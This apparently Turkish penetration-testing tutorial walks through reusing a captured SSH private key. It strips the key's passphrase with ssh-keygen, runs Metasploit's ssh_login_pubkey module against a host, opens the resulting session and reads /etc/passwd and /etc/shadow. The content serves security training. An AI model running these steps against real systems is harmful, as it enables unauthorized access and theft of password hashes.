Sızma testleri sırasında “id_rsa_anahtari” adlı bir anahtar elde edilmiş olsun.
cd Desktop
ls -la id*
cat id_rsa_anahtari
Bu anahtar ile oturum açılabilecek sistemlere erişimler için kullanılabilecek MSF ssh_login_pubkey auxiliary modülünün özellikleri incelenir.
search ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
show options
Bu modül parola koruması olan özel anahtarları kabul etmemektedir. Bu sebeple parolası olan özel anahtarların parolası kaldırılmalıdır.
ls -la id*
cat id_rsa_anahtari
Parola kaldırılması için ssh-keygen aracı kullanılabilir:
ssh-keygen -p -f /root/Desktop/id_rsa_anahtari
Modülün seçenekleri ayarlanır:
set RHOSTS 100.100.200.7
set USERNAME yenikullanici
set KEY_PATH /root/Desktop/id_rsa_anahtari
Not: KEY_PATH seçeneğine dizin de verilebilir. Ancak false pozitif durumlar çıkabilmektedir.
Modül çalıştırıldığında erişim sağlanabilecek IP’lere bağlantı açıkmış olur.
run
Bu bağlantı erişim sağlanan kullanıcının yetkileri ile gerçekleşir.
sessions -l
sessions -i 1
id
cat /etc/passwd | head -5
cat /etc/shadow | head -5